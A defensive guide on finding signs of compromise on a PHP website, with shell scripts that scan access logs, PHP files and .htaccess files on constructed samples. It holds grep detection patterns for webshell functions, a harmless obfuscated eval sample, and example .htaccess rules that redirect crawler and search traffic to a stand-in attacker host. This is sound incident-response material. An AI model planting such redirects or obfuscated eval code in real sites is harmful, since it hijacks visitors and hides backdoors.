Source: http://www.gregfreeman.org/2013/how-to-tell-if-your-php-site-has-been-compromised/
0x01 Check the access log

Look for file-upload activity (POST requests), for example:

```
IPREMOVED - - [01/Mar/2013:06:16:48 -0600] "POST /uploads/monthly_10_2012/view.php HTTP/1.1" 200 36 "-" "Mozilla/5.0"
IPREMOVED - - [01/Mar/2013:06:12:58 -0600] "POST /public/style_images/master/profile/blog.php HTTP/1.1" 200 36 "-" "Mozilla/5.0"
```

nginx's default access-log directive is:

```
access_log logs/access.log
```

or

```
access_log logs/access.log combined;
```

nginx writes its logs by default under:

```
<nginx install directory>/log/
```
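The triage step above can be scripted rather than read by eye. The following is an added example, not part of the original article: it runs over a combined-format access log (nginx or Apache), counts POST requests to `.php` files under directories that should only ever hold static uploads, and lists the client addresses behind one of the hits. The log lines and the directory regex `'^/(uploads|public/style_images)/'` are constructed for this example.

```shell
#!/bin/sh
# Added example, not part of the original article: triage a combined-format
# access log for POST requests to PHP files under directories that should
# only hold static uploads. The log lines below are constructed; the paths
# echo the shape of the entries shown above.
LOG_SAMPLE='10.0.0.1 - - [01/Mar/2013:06:16:48 -0600] "POST /uploads/monthly_10_2012/view.php HTTP/1.1" 200 36 "-" "Mozilla/5.0"
10.0.0.2 - - [01/Mar/2013:06:17:01 -0600] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.1 - - [01/Mar/2013:06:17:30 -0600] "POST /uploads/monthly_10_2012/view.php HTTP/1.1" 200 36 "-" "Mozilla/5.0"
10.0.0.3 - - [01/Mar/2013:06:12:58 -0600] "POST /public/style_images/master/profile/blog.php HTTP/1.1" 200 36 "-" "Mozilla/5.0"
10.0.0.4 - - [01/Mar/2013:06:20:00 -0600] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"'

# suspicious_posts LOGFILE DIR_REGEX
# Prints "count path" for every POST to a .php file whose path matches
# DIR_REGEX (an extended regex of directories that should never execute
# PHP), most frequent first. In the combined format field 6 is the quoted
# method ("POST) and field 7 the request path.
suspicious_posts() {
    awk -v dirs="$2" '
        $6 == "\"POST" && $7 ~ /\.php([?].*)?$/ && $7 ~ dirs { hits[$7]++ }
        END { for (p in hits) printf "%d %s\n", hits[p], p }
    ' "$1" | sort -rn
}

# source_ips LOGFILE PATH
# Lists the client addresses that POSTed to PATH, one per line, so a finding
# can be pivoted back to the rest of that client's activity in the log.
source_ips() {
    awk -v p="$2" '$6 == "\"POST" && $7 == p { print $1 }' "$1" | sort -u
}

# Stand-alone usage on the constructed sample.
log_file=$(mktemp)
printf '%s\n' "$LOG_SAMPLE" > "$log_file"
suspicious_posts "$log_file" '^/(uploads|public/style_images)/'
source_ips "$log_file" /uploads/monthly_10_2012/view.php
rm -f "$log_file"
```

On the sample this reports two paths (`view.php` twice, `blog.php` once) and ignores the POST to `wp-login.php`, which is an expected write target. Adjust the directory regex to the upload and static-asset directories of the application you are looking at; anything that executes PHP from those paths is worth opening.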
0x02 Find files containing malicious PHP code

2.1 Find recently modified PHP files

```sh
find . -type f -name '*.php' -mtime -7
```

`-type f` restricts the search to regular files; `-mtime -7` selects files modified within the last 7*24 hours.

The output might look like:

```
./uploads/monthly_04_2008/index.php
./uploads/monthly_10_2008/index.php
./uploads/monthly_08_2009/template.php
./uploads/monthly_02_2013/index.php
```

2.2 Search files for suspicious code

```sh
find . -type f -name '*.php' | xargs grep -l "eval *(" --color
```

(the `*` stands for any number of spaces)

```sh
find . -type f -name '*.php' | xargs grep -l "base64_decode *(" --color
find . -type f -name '*.php' | xargs grep -l "gzinflate *(" --color
find . -type f -name '*.php' | xargs grep -l "eval *(str_rot13 *(base64_decode *(" --color
```

Note: many commands do not take their arguments from a pipe, yet that is what is needed here, so `xargs` is used to turn the piped file names into command arguments. `grep -l` prints only the names of files that contain the string; without `-l`, grep prints the matching lines themselves.

What the special strings mean:

eval() executes a string as PHP code and is the most common PHP one-line backdoor.

base64_decode() decodes a base64 string; attackers often base64-encode the payload, which is where this function comes in.

gzinflate() decompresses a string; a payload compressed with gzdeflate is unpacked with it.

str_rot13() applies ROT13 to a string.

A regular expression can also be used to search files for suspicious code:

```sh
find . -type f -name '*.php' | xargs egrep -i "(mail|fsockopen|pfsockopen|stream_socket_client|exec|system|passthru|eval|base64_decode) *\("
```

The functions commonly used by webshells are explained below:

mail(): can be used to send spam to the site's users

fsockopen(): opens a network connection or a Unix socket connection; a payload can use it to make remote requests

pfsockopen(): similar to fsockopen()

stream_socket_client(): establishes a remote connection, for example:

```php
<?php
$fp = stream_socket_client("tcp://www.example.com:80", $errno, $errstr, 30);
if (!$fp) {
    echo "$errstr ($errno)<br />\n";
} else {
    fwrite($fp, "GET / HTTP/1.0\r\nHost: www.example.com\r\nAccept: */*\r\n\r\n");
    while (!feof($fp)) {
        echo fgets($fp, 1024);
    }
    fclose($fp);
}
?>
```

exec(): command execution

system(): same as exec()

passthru(): same as exec()

When a preg_replace() regular expression carries the "e" modifier, the replacement string is executed as PHP code before the substitution is made. This case also has to be considered and can be searched for with:

```sh
find . -type f -name '*.php' | xargs egrep -i "preg_replace *\((['|\"])(.).*\2[a-z]*e[^\1]*\1 *," --color
```
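The individual `find | xargs grep` commands in 2.1 and 2.2 can be folded into one reusable scanner. The script below is an added example, not the article's own code: it lists recently modified PHP files, greps every PHP file for the function list above plus the `preg_replace` "e" modifier, and reports `file:line:text`. It adds one refinement the one-liners lack, a leading non-word-character group so that `email(` is not reported as `mail(`. The `/e` heuristic assumes one of the common delimiters `/ # | ~`; the three sample files are constructed in a temporary directory so the script runs offline.

```shell
#!/bin/sh
# Added example, not the article's own script: scan a tree for PHP files
# that call the functions discussed above (plus preg_replace with the /e
# modifier), reporting file:line:match, and list recently modified files.
# The sample files are constructed in a temporary directory.

# Functions worth a second look. The leading group requires a non-word
# character (or line start) before the name, so "email(" is not "mail(".
SUSPECT_RE='(^|[^a-zA-Z0-9_])(eval|base64_decode|gzinflate|str_rot13|exec|system|passthru|fsockopen|pfsockopen|stream_socket_client|mail)[[:space:]]*\('
# Heuristic for preg_replace('<pattern><delim><modifiers containing e>', ...);
# assumes one of the delimiters / # | ~ (an assumption of this example).
PREG_E_RE="preg_replace[[:space:]]*\([[:space:]]*['\"].*[/#|~][a-zA-Z]*e[a-zA-Z]*['\"]"

# scan_php ROOT: print file:line:text for every suspicious line.
# /dev/null is passed as an extra operand so grep always prefixes the file
# name, even when find hands it a single file (portable alternative to -H).
scan_php() {
    find "$1" -type f -name '*.php' \
        -exec grep -niE -e "$SUSPECT_RE" -e "$PREG_E_RE" /dev/null {} + 2>/dev/null
}

# suspect_file_count ROOT: number of distinct files flagged by scan_php.
suspect_file_count() {
    scan_php "$1" | cut -d: -f1 | sort -u | wc -l | tr -d ' '
}

# recent_php ROOT DAYS: PHP files modified within the last DAYS*24 hours
# (the same find invocation as section 2.1).
recent_php() {
    find "$1" -type f -name '*.php' -mtime "-$2"
}

# make_samples: build a constructed tree and print its path.
make_samples() {
    root=$(mktemp -d)
    mkdir -p "$root/uploads/monthly_02_2013" "$root/lib"
    # benign: htmlspecialchars( and email( must not be flagged
    cat > "$root/lib/helper.php" <<'EOF'
<?php
function greet($name) { return "Hello, " . htmlspecialchars($name); }
function email($to) { return filter_var($to, FILTER_VALIDATE_EMAIL); }
EOF
    # constructed obfuscation pattern; the string only decodes to "echo 1;"
    cat > "$root/uploads/monthly_02_2013/index.php" <<'EOF'
<?php
eval(base64_decode('ZWNobyAxOw=='));
EOF
    # constructed /e-modifier use (removed in PHP 7, still seen in old trees)
    cat > "$root/uploads/old.php" <<'EOF'
<?php
$out = preg_replace('/(.*)/e', 'strtoupper("\1")', $input);
EOF
    printf '%s\n' "$root"
}

# Stand-alone usage on the constructed tree.
sample_root=$(make_samples)
echo "--- PHP files modified in the last 7 days ---"
recent_php "$sample_root" 7
echo "--- suspicious lines ---"
scan_php "$sample_root"
echo "flagged files: $(suspect_file_count "$sample_root")"
rm -rf "$sample_root"
```

Run against a real document root, expect legitimate hits too: frameworks call `exec()`, `mail()` and `base64_decode()` in ordinary code, so treat the output as a reading list rather than a verdict, and compare flagged files against a clean copy (section 0x03) before judging them.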
0x03 Compare code files

This requires a clean copy of the code, which is then compared against the code in use, for example:

```sh
diff -r wordpress-clean/ wordpress-compromised/ -x wp-content
```

The example above compares the wordpress-clean/ and wordpress-compromised/ directories, skipping the wp-content/ subdirectory inside them.
0x04 Search writable directories

Check whether these directories contain suspicious files. The following script finds directories with 777 permissions and looks for PHP files inside them:

```sh
search_dir=$(pwd)
# every directory under the current tree that is world-writable
writable_dirs=$(find "$search_dir" -type d -perm 0777)
for dir in $writable_dirs
do
    #echo $dir
    find "$dir" -type f -name '*.php'
done
```

PHP code is often hidden inside jpg files, so jpg files in these directories should be checked as well:

```sh
find wp-content/uploads -type f -iname '*.jpg' | xargs grep -i php
```

Note: `-iname` matches file names case-insensitively; `grep -i` is likewise case-insensitive.
0x05 Detect iframe tags

A common technique is to embed iframe tags, so view the page source and search it for iframe tags with:

```sh
grep -i '<iframe' mywebsite.txt
```

For dynamically generated pages, use Firefox's Live HTTP Headers add-on to download the source, then search it for iframe tags.

0x06 Search the database for suspicious strings

Including `%base64_%`, `%eval(%<` and the other keywords mentioned above.
0x07 Check .htaccess files

Check whether they contain auto_prepend_file or auto_append_file, using:

```sh
find . -type f -name '\.htaccess' | xargs grep -i auto_prepend_file
find . -type f -name '\.htaccess' | xargs grep -i auto_append_file
```

auto_prepend_file loads a PHP script before the current script file; auto_append_file loads a PHP script after it. If .htaccess has been modified this way, then whenever a PHP script in that directory is requested, the malicious script chosen by the attacker is loaded along with it.

.htaccess files can also be used to hijack the site's traffic to the attacker's site:

```apache
RewriteCond %{HTTP_USER_AGENT} ^.*Baiduspider.*$
RewriteRule ^(.*)$ http://www.hacker.com/muma.php [R=301]
```

This redirects visits from the Baidu crawler to the attacker's site (note the HTTP_USER_AGENT and http keywords).

```apache
RewriteCond %{HTTP_REFERER} ^.*baidu.com.*$
RewriteRule ^(.*)$ http://www.hacker.com/muma.php [R=301]
```

This redirects traffic arriving from the Baidu search engine to the attacker's site (note the HTTP_REFERER and http keywords). To check whether .htaccess changes are hijacking traffic, search the .htaccess files with:

```sh
find . -type f -name '\.htaccess' | xargs grep -i http
find . -type f -name '\.htaccess' | xargs grep -i HTTP_USER_AGENT
find . -type f -name '\.htaccess' | xargs grep -i HTTP_REFERER
```
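The five `.htaccess` greps above can be combined into a single audit that prints where each finding sits. The script below is an added example, not from the original article: it walks every `.htaccess` under a root and flags `auto_prepend_file`/`auto_append_file` overrides, `RewriteCond` lines keyed on `HTTP_USER_AGENT` or `HTTP_REFERER`, and `RewriteRule` lines whose target is an absolute `http(s)://` URL. The two sample files, the stock WordPress front-controller rules as the benign case and a constructed override-plus-redirect as the suspicious one, are written to a temporary directory; `redirect-target.example` and `/tmp/prepend-placeholder.php` are placeholders.

```shell
#!/bin/sh
# Added example, not from the original article: audit every .htaccess under a
# root for auto_prepend_file / auto_append_file overrides and for rewrite
# rules keyed on user agent or referer that send visitors off-site.
# Sample files are constructed below.

# check_htaccess ROOT: print file:line:text for each suspicious directive.
# /dev/null forces grep to prefix the file name even for a single file.
check_htaccess() {
    find "$1" -type f -name '.htaccess' -exec grep -niE \
        -e 'auto_(prepend|append)_file' \
        -e '^[[:space:]]*RewriteCond.*%\{HTTP_(USER_AGENT|REFERER)\}' \
        -e '^[[:space:]]*RewriteRule.*https?://' \
        /dev/null {} + 2>/dev/null
}

# htaccess_verdict ROOT: prints "clean" or "suspicious: N findings".
htaccess_verdict() {
    n=$(check_htaccess "$1" | wc -l | tr -d ' ')
    if [ "$n" -eq 0 ]; then echo clean; else echo "suspicious: $n findings"; fi
}

# make_samples: build a constructed tree and print its path.
make_samples() {
    root=$(mktemp -d)
    mkdir -p "$root/wp-content/uploads"
    # benign: the stock WordPress front-controller rewrite, no off-site target
    cat > "$root/.htaccess" <<'EOF'
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule . /index.php [L]
</IfModule>
EOF
    # constructed: prepend override plus a crawler-keyed off-site redirect
    # (placeholder paths and host, not real indicators)
    cat > "$root/wp-content/uploads/.htaccess" <<'EOF'
php_value auto_prepend_file /tmp/prepend-placeholder.php
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^.*Baiduspider.*$
RewriteRule ^(.*)$ http://redirect-target.example/landing.php [R=301]
EOF
    printf '%s\n' "$root"
}

# Stand-alone usage on the constructed tree.
sample_root=$(make_samples)
check_htaccess "$sample_root"
htaccess_verdict "$sample_root"
rm -rf "$sample_root"
```

On the sample the benign root file produces nothing and the uploads file yields three findings. A `php_value auto_prepend_file` line only takes effect under mod_php; on a PHP-FPM host the same override would live in a `.user.ini` file, which is worth a parallel `find -name '.user.ini'` when this audit comes back clean.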